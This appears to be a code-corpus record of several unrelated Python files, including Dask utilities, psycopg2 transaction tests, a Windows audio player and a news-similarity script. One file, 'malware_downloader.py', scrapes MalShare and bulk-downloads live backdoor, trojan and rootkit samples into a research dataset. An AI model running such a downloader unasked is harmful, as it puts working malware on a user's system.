self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addr, default_listen_ip=""):
"""
Examples
--------
>>> clean_dashboard_address(8787)
{'address': '', 'port': 8787}
>>> clean_dashboard_address(":8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("foo:8787")
{'address': 'foo', 'port': 8787}
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
return {"address": host, "port": port}
|
test_transaction.py | #!/usr/bin/env python
import threading
import unittest
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
import tests
class TransactionTests(unittest.TestCase):
def setUp(self):
self.conn = psycopg2.connect(tests.dsn)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
curs = self.conn.cursor()
curs.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
# The constraint is set to deferrable for the commit_failed test
curs.execute('''
CREATE TEMPORARY TABLE table2 (
id int PRIMARY KEY,
table1_id int,
CONSTRAINT table2__table1_id__fk
FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
curs.execute('INSERT INTO table1 VALUES (1)')
curs.execute('INSERT INTO table2 VALUES (1, 1)')
self.conn.commit()
def tearDown(self):
self.conn.close()
def test_rollback(self):
# Test that rollback undoes changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.rollback()
self.assertEqual(self.conn.status, STATUS_READY)
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [])
def test_commit(self):
# Test that commit stores changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.commit()
self.assertEqual(self.conn.status, STATUS_READY)
# Now rollback and show that the new record is still there:
self.conn.rollback()
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [(2, 1)])
def test_failed_commit(self):
# Test that we can recover from a failed commit.
# We use a deferred constraint to cause a failure on commit.
curs = self.conn.cursor()
curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
curs.execute('INSERT INTO table2 VALUES (2, 42)')
# The commit should fail, and move the cursor back to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
self.assertEqual(self.conn.status, STATUS_READY)
# The connection should be ready to use for the next transaction:
curs.execute('SELECT 1')
self.assertEqual(curs.fetchone()[0], 1)
class DeadlockSerializationTests(unittest.TestCase):
"""Test deadlock and serialization failure errors."""
def connect(self):
conn = psycopg2.connect(tests.dsn)
conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
return conn
def setUp(self):
self.conn = self.connect()
curs = self.conn.cursor()
# Drop table if it already exists
try:
curs.execute("DROP TABLE table1")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
try:
curs.execute("DROP TABLE table2")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
# Create sample data
curs.execute("""
CREATE TABLE table1 (
id int PRIMARY KEY,
name text)
""")
curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
self.conn.commit()
def tearDown(self):
curs = self.conn.cursor()
curs.execute("DROP TABLE table1")
curs.execute("DROP TABLE table2")
self.conn.commit()
self.conn.close()
def test_deadlock(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
step1.set()
step2.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
step2.set()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
def test_serialisation_failure(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("SELECT name FROM table1 WHERE id = 1")
curs.fetchall()
step1.set()
step2.wait()
curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
class QueryCancelationTests(unittest.TestCase):
"""Tests for query cancelation."""
def setUp(self):
self.conn = psycopg2.connect(tests.dsn)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
def test_statement_timeout(self):
curs = self.conn.cursor()
# Set a low statement timeout, then sleep for a longer period.
curs.execute('SET statement_timeout TO 10')
self.assertRaises(psycopg2.extensions.QueryCanceledError,
curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
|
Audio.py | '''
Audio player and controller from Automator
==========================================
github: https://github.com/Davide255/Automator
module from core.audio
See Audio class fro docs
MIT License
Copyright (c) 2022 Davide
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import time, os
#Audio Requirements
from ctypes import POINTER, cast
from os import environ
class Audio:
'''
Class for controlling playing audios and queues
===============================================
Simples:
Playing audio file:
>>> from Audio import Audio
>>> Audio().play_audio('path\\to\\file.ext')
Controlling Audio in your system:
>>> from Audio import Audio
>>> controller = Audio.Controller()
>>> controller.setMasterLevel(60) #volume will be set to 60%
Advanced:
Real time control:
>>> from Audio import Audio
>>> Audio().play_audio('path\\to\\file.ext', True) #True means that this
instruction will be executed
in a separate Thread
>>> while True:
>>> command = input('Audio %s is playing:\nP) Play/Pause\nQ) Quit\n\nWhat did you choose? ')
>>> if command in ('p', 'P'):
>>> Audio.play_pause()
>>> elif command in ('q', 'Q'):
>>> Audio.quit()
>>> break
>>> else: print('Unknown command')
>>> print ("\033[A \033[A") #clean line
Play from Youtube audio:
>>> from Audio import Audio
>>> from AudioHelpers import Youtube
>>> Audio.from_stream(Youtube('url').get_stream())
>>> while Audio.is_playing():
>>> pass
Mute/Unmute a sigle process:
>>> from Audio import Audio
>>> from core.process import getallprocs
>>> controller = Audio.Controller()
>>> for p in getallprocs(name=False):
'''
events = ('media_ended', 'source_changed', 'volume_changed', 'playback_state_changed', 'position_changed')
class Controller:
class Process:
def __init__(self, process_name) -> None:
if process_name != None:
self.process_name = process_name
def mute(self):
from libs.PyCAW import AudioUtilities
import logging as Logger
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
interface = session.SimpleAudioVolume
if session.Process and self.process_name in session.Process.name():
print(dir(interface))
interface.SetMute(1, None)
Logger.info('Audio:', self.process_name, 'has been muted.')
def unmute(self):
from libs.PyCAW import AudioUtilities
import logging as Logger
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
interface = session.SimpleAudioVolume
if session.Process and self.process_name in session.Process.name():
print(dir(interface))
interface.SetMute(0, None)
Logger.info('Audio:', self.process_name, 'has been unmuted.')
def get_volume(self):
from libs.PyCAW import AudioUtilities
import logging as Logger
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
interface = session.SimpleAudioVolume
if session.Process and session.Process.name() == self.process_name:
Logger.info('Audio: Volume:' + str(round(interface.GetMasterVolume() ** 100)) + '%')
return round(interface.GetMasterVolume() ** 100)
def set_volume(self, volume):
from libs.PyCAW import AudioUtilities
import logging as Logger
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
interface = session.SimpleAudioVolume
if session.Process and session.Process.name() == self.process_name:
Logger.info('Audio: Volume:' + str(round(interface.GetMasterVolume() ** 100)) + '%')
return not bool(interface.SetMasterVolume(volume/100, None))
def get_all_sessions(self):
from libs.PyCAW import AudioUtilities
sessions = AudioUtilities.GetAllSessions()
procs = list()
for session in sessions:
if session.Process:
procs.append(session.Process.name())
return procs
def setMasterLevel(self, level):
if isinstance(level, int):
level = level/100
if level > 1.0:
level = level/10
from comtypes import CLSCTX_ALL, CoUninitialize
from libs.PyCAW import AudioUtilities, IAudioEndpointVolume
interface = AudioUtilities.GetSpeakers().Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
volume.SetMasterVolumeLevelScalar(level, None)
CoUninitialize()
async def async_initiallize(self):
from winrt.windows.media.playback import MediaPlayer
if hasattr(Audio, 'mediaplayer'):
del Audio.mediaplayer
Audio.mediaplayer = MediaPlayer()
Audio.mediaplayer.add_media_ended(Audio.media_ended)
Audio.mediaplayer.add_source_changed(Audio.source_changed)
Audio.mediaplayer.add_volume_changed(Audio.volume_changed)
Audio.mediaplayer.playback_session.add_playback_state_changed(Audio.playback_state_changed)
Audio.mediaplayer.playback_session.add_position_changed(Audio.position_changed)
def from_stream(stream_obj):
import asyncio
asyncio.run(Audio().async_initiallize())
from winrt.windows.foundation import TimeSpan
from winrt.windows.media.playback import MediaPlaybackItem
Audio._stream = stream_obj
item = MediaPlaybackItem(stream_obj.stream)
Audio.mediaplayer.source = item
Audio.duration = TimeSpan()
Audio.duration.duration = stream_obj.data.length * 10000000
Audio.title = stream_obj.data.title
Audio._update_display_properties(item)
Audio.play()
from threading import Thread
Thread(target=Audio.stream_end_handler, daemon=True).start()
def get_stream(self):
if hasattr(Audio, '_stream'):
return Audio._stream
def is_stream(self):
return True if hasattr(Audio, 'duration') else False
def stream_end_handler():
while True:
if Audio().get_pos() == Audio().get_total():
Audio().media_ended()
break
else:
time.sleep(1)
def _menu_voices(self, state:bool):
try:
from libs.LibWin import SysTrayIcon
if state:
Audio_voices = ("Play/Pause Audio", None, lambda *args: Audio().play_pause()), ("Close Audio", None, lambda *args: Audio().quit()),
else:
Audio_voices = ("Play/Pause Audio", None, SysTrayIcon.Item_Deactivate), ("Close Audio", None, SysTrayIcon.Item_Deactivate),
for i in Audio_voices:
SysTrayIcon().EditMenuItemInfo(i[0], i)
except ImportError:
pass
def _update_display_properties(item):
from winrt.windows.media import MediaPlaybackType
props = item.get_display_properties()
props.type = MediaPlaybackType.MUSIC
props.music_properties.title = Audio.title
item.apply_display_properties(props)
async def _play_audio(self, filename, keep_alive: bool = True):
from winrt.windows.media.playback import MediaPlaybackItem, MediaPlaybackState
from winrt.windows.media import core
from winrt.windows.storage import StorageFile
import asyncio
await asyncio.create_task(self.async_initiallize())
if isinstance(filename, str):
try:
file = await StorageFile.get_file_from_path_async(filename)
except RuntimeError:
print(filename, 'is not a valid file')
Audio.title = ''
return
Audio.title = file.display_name
Audio.source = core.MediaSource.create_from_storage_file(file)
elif isinstance(filename, core.MediaSource):
Audio.source = filename
Audio.title = ''
else:
raise Audio.FileTypeError('No file was specified!')
item = MediaPlaybackItem(Audio.source)
Audio.mediaplayer.source = item
Audio.mediaplayer.play()
del Audio._stream
#update the display proprieties
self._menu_voices(True)
if keep_alive:
try:
session = Audio.mediaplayer.playback_session
while session.playback_state != MediaPlaybackState.NONE:
time.sleep(2)
return
except RuntimeError:
return
except KeyboardInterrupt:
Audio().quit()
class StopMusic(BaseException):
pass
def quit():
try:
Audio.mediaplayer.close()
if os.environ.get('DEBUG'):
print('[DEBUG ] [Media ] Audio player destroyed')
except AttributeError:
try:
from kivy.logger import Logger
Logger.debug('Audio: No media player initiallized, skipping')
except ImportError:
pass
def play():
Audio.mediaplayer.play()
def pause():
Audio.mediaplayer.pause()
def play_pause():
try:
from winrt.windows.media.playback import MediaPlaybackState
session = Audio.mediaplayer.playback_session.playback_state
if session == MediaPlaybackState.PLAYING:
Audio.pause()
elif session == MediaPlaybackState.PAUSED:
Audio.play()
else:
pass
except RuntimeError:
pass
def play_audio(self, filename, threadded=False):
import asyncio
#: Union[str, bytes, PathLike[str], PathLike[bytes], IO]
#: Optional[str]
if threadded:
asyncio.run(self._play_audio(filename, False))
#Logger.debug('Audio: audio started at {}'.format(datetime.now()))
return True
else:
#Logger.debug('Audio: audio started at {}'.format(datetime.now()))
asyncio.run(self._play_audio(filename))
return True
def get_pos(self):
try:
return round(Audio.mediaplayer.playback_session.position.duration / 10000000)
except RuntimeError:
return 0
def set_pos(self, date):
if isinstance(date, str):
date = sum(int(x) * 60 ** i for i, x in enumerate(reversed(date.split(':'))))
from winrt.windows.foundation import TimeSpan
tm = TimeSpan()
tm.duration = int(date) * 10000000
try:
Audio.mediaplayer.playback_session.position = tm
except RuntimeError:
pass
pass
def get_total(self):
if hasattr(Audio, 'duration'):
return round(Audio.duration.duration / 10000000)
elif hasattr(Audio, 'source') and hasattr(Audio.source.duration, 'duration'):
return round(Audio.source.duration.duration / 10000000)
else:
return 0
def is_playing(self):
try:
from winrt.windows.media.playback import MediaPlaybackState
session = Audio.mediaplayer.playback_session.playback_state
return True if session == MediaPlaybackState.PLAYING else False
except RuntimeError:
return False
def set_volume(self, volume):
if volume > 1:
volume /= 100
try:
Audio.mediaplayer.volume = volume
except AttributeError:
pass
def get_volume(self):
try:
return Audio.mediaplayer.volume * 100
except AttributeError:
return 0
def bind(self, **kwargs):
for i in list(kwargs.keys()):
if i in self.events:
exec('Audio.{} = kwargs[i]'.format(i))
else:
raise KeyError('"%s" is not an event! Events are: %s' % (i, self.events)) from None
class NotSupportedFile(BaseException):
pass
class FileTypeError(BaseException):
pass
# events
def media_ended(self, *args, **kwargs):
''' default media_ended handler '''
Audio.quit()
def source_changed(self, *args, **kwargs):
''' default source_changed handler '''
pass
def volume_changed(self, *args, **kwargs):
''' default volume_changed handler '''
pass
def playback_state_changed(self, *args, **kwargs):
''' default playback_state_changed handler '''
pass
def position_changed(self, *args, **kwargs):
''' default position_changed handler '''
pass
class Queue:
def __init__(self, queue_definition: object, random: bool = True, repeat: int = 0, threadded: bool = False, daemon: bool = None, **t_kwargs) -> None:
'''
Play a music Queue
==================
simple usage:
Select music from a list:
>>> from audio import Audio
>>> Audio.Queue(['file1.mp3', 'some\\dir\\file2.mp3'])
select a music from a file:
>>> from audio import Audio
>>> Audio.Queue(file.txt or file.json) #see options to know file format
select music from a folder:
>>> from audio import Audio
>>> folder = Audio.Queue.Folder('C:\\Users\\david\\Music\\Dede')
>>> Audio.Queue(folder)
options:
queue_definition:
the list of files name that must be:
- list
- file with .read() support
- .json file like formatted as {"queue":[somefiles]}
- Queue.Folder object
random:
ramdom choose the order of audios
threadded (for advanced users):
Start a thread as Queue manager, with this option you have the full control of queue function:
for example, stopping a queue:
>>> from audio import Audio
>>> Audio.Queue(['file1.mp3', 'some\\dir\\file2.mp3'], threadded=True)
>>>
>>> while True: # <- Leave the process open
>>> if input() == '': # <- on enter press
>>> Audio.Queue.quit() #<- do not pass self parameter
>>> break #<- interrupt the main loop
other options:
Audio.Queue.next() play the next song on in the list
Audio.Queue.provious() play the previous song in the list
'''
import asyncio
asyncio.run(Audio().async_initiallize())
if threadded:
asyncio.run(self.play_queue_mp(queue_definition, random, repeat, False))
else:
asyncio.run(self.play_queue_mp(queue_definition, random, repeat))
async def play_queue_mp(self, queue_definition: object, random: bool = False, repeat: int = 0, keep_alive: bool = True):
from winrt.windows.media.playback import MediaPlaybackItem, MediaPlaybackList, MediaPlaybackState
from winrt.windows.media import core, MediaPlaybackType
from winrt.windows.storage import StorageFile
try:
if environ['queue_playing'] == '1':
try:
from kivy.logger import Logger
except ImportError:
import logging as Logger
Logger.warning('A queue from automator is already playing. End it to start a new one')
return
else:
environ['queue_playing'] = '1'
except KeyError:
environ['queue_playing'] = '1'
try:
queue = queue_definition.read()
queue = queue.split('\n')
except (IOError, OSError, AttributeError):
if isinstance(queue_definition, str):
try:
suffix = os.path.basename(queue_definition).split('.')[1]
if not os.path.isfile(queue_definition):
raise FileNotFoundError('file {} not found!'.format(queue_definition))
except IndexError:
raise Audio.NotSupportedFile('extension is not supported')
if suffix == 'json':
from json import load
js = load(open(queue_definition, 'r'))
queue = js['queue']
elif suffix == 'txt':
file = open(queue_definition, 'r')
queue = file.read().split('\n')
file.close()
elif isinstance(queue_definition, list):
queue = queue_definition
elif isinstance(queue_definition, self.Folder):
queue = [os.path.join(self.Folder.folder, f) for f in os.listdir(self.Folder.folder) if os.path.isfile(os.path.join(self.Folder.folder, f))]
Audio.Queue._list = MediaPlaybackList()
Audio.Queue._list.shuffle_enabled = random
print(dir(Audio.Queue._list))
file_list = {}
for i in queue:
if i.endswith('mp3'):
f = await StorageFile.get_file_from_path_async(i)
file_list[i] = f
for f in file_list:
metas = os.path.basename(f).split(' - ')
if len(metas) > 1:
artist = metas[0]
title = metas[1].split('.')[0]
else:
artist = ''
title = metas[0].split('.')[0]
_item = MediaPlaybackItem(core.MediaSource.create_from_storage_file(file_list[f]))
prop = _item.get_display_properties()
prop.type = MediaPlaybackType.MUSIC
prop.music_properties.title = title
prop.music_properties.artist = artist
_item.apply_display_properties(prop)
Audio.Queue._list.items.append(_item)
Audio.mediaplayer.source = Audio.Queue._list
Audio.mediaplayer.play()
Audio()._menu_voices(True)
if keep_alive:
try:
session = Audio.mediaplayer.playback_session.playback_state
while session != MediaPlaybackState.NONE:
time.sleep(2)
return
except (RuntimeError, KeyboardInterrupt):
Audio().quit()
def next():
Audio.Queue._list.move_next()
def previous():
Audio.Queue._list.move_previous()
def pause():
Audio.pause()
def play():
Audio.play()
def quit():
Audio.quit()
return
class Folder:
folder = None
def __init__(self, folder) -> None:
Audio.Queue.Folder.folder = folder
|
malware_downloader.py | """
Malware dataset builder
"""
import time
from requests import get
from bs4 import BeautifulSoup
from threading import Thread
url_backdoor = 'https://malshare.com/search.php?query=backdoor'
url_trojan = 'https://malshare.com/search.php?query=trojan'
url_rootkit = 'https://malshare.com/search.php?query=rootkit'
url_root = 'https://malshare.com/'
key = #insert your API key.
urls = {
'backdoor': url_backdoor,
'trojan': url_trojan,
'rootkit': url_rootkit
}
folders = {
'backdoor': 'dataset/malwares/backdoor',
'trojan': 'dataset/malwares/trojan',
'rootkit': 'dataset/malwares/rootkit'
}
range_dict = {
'backdoor': 0,
'trojan': 0,
'rootkit': 0
}
def download_data(name, url):
print(name, url)
response = get(url)
html_soup = BeautifulSoup(response.text, 'html.parser')
hash_container = html_soup.find_all('td', class_ = 'hash_font')
print(type(hash_container))
print(len(hash_container))
for i in range(range_dict[name], len(hash_container)):
print(name, i)
path = f'{folders[name]}/{name}_{hash_container[i].string}.bin'
print(path)
api = '/api.php?api_key={}&action=getfile&hash={}'.format(key, hash_container[i].string)
r = get(url_root+api)
print(open(path, 'wb').write(r.content))
thread_backdoor = Thread(target=download_data, args=('backdoor', urls['backdoor']))
thread_backdoor.start()
thread_rootkit = Thread(target=download_data, args=('rootkit', urls['rootkit']))
thread_rootkit.start()
thread_trojan = Thread(target=download_data, args=('trojan', urls['trojan']))
thread_trojan.start()
while(1):
time.sleep(0.1)
|
threading_simpleargs.py | import threading
def worker(num):
"""thread worker function"""
print('Worker: %s' % num)
threads = []
for i in range(5):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
|
StaleNewsProcedureMultiprocessing.py | """
This file should implement the procedures detailed in the stale news paper.
Code originally by Christopher Gong,
Optimized by Jonathan Bodine.
Summary:
The methods below apply the stale news procedure outline in the paper
"When Can the Market Identify Stale News? " by Anasteesia Fedyk and James Hodson.
The procedure goes through each article in chronological order from multiple sorted
nml files, checking its similarity with articles about the same company that have
been previously seen by the procedure and are within the last 72 hours. If an article
is about multiple companies, the article will be processed once per company.
A provided similarity test is used, and key similarity information
(DATE_EST, STORY_ID, TICKER, CLOSEST_ID, CLOSEST_SCORE, TOTAL_OVERLAP,
IS_OLD, IS_REPRINT, IS_RECOMB) is written to a csv file.
Optimizations:
Understanding the mere size of the number of articles published in a day,
and the decade long amount of data to be processed in this way, key optimizations
can be made to drastically reduce the time needed to for the procedure. First,
articles are processed one at a time in a getter structure for less memory useage.
Theoretically, the procedure can handle an infinite sequence of articles. Second,
after an article has been processed, only important informaton is kept, in a story
class. Third, the stories related to a company are stored in a linked list in reverse
chronological order. When processing a new article, only the previous 72 hours of
articles are considered, and any older articles will be removed by way of cut
(or prune) of the linked list, to never have more than 72 hours of articles
for a comapny to be stored. This optimization can be made because the articles
are considered in chronological order.
"""
import xml.etree.ElementTree as ET
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import nltk
from nltk.stem.porter import *
from pytz import timezone
import dateutil.parser
import datetime
import heapq
import numpy as np
import csv
import sys
import os
import time
from multiprocessing import Process, Queue, Pipe, cpu_count
import glob
fs = glob.glob('data/*.nml')
eastern = timezone('US/Eastern')
stop_words = set(stopwords.words('english'))
stemmer = PorterStemmer()
stemDict = dict()
wordDict = dict()
def xmlTreeGetter(filename):
'''
A getter function for each article. When next is called, it will return the
next article. The files are split by the </doc> tag, which is at the end
of every article.
'''
nmlFile = open(filename)
text = ""
for line in nmlFile:
text += line
if "</doc>" in line:
yield ET.fromstring(text)
text = ""
def article(etree):
'''Given etree, return article'''
art = etree.find("djnml").find("body").find("text")
article = ""
if art is None:
return article
else:
for element in art:
article += element.text
return article
def headline(etree):
'''Given etree, return headline'''
return etree.find("djnml").find("body").find("headline").text
def tickercreator(etree):
'''Given etree, return ticker list'''
#ft.begin("tickercreator")
tik = etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").find("djn-coding").find("djn-company")
tickers = []
if tik is None:
return tickers
for t in tik:
tickers += [t.text]
return tickers
def accessionNum(etree):
'''Given etree, return acession number'''
return etree.attrib['md5']
def displayDate(etree):
'''Given etree, reutrn display date'''
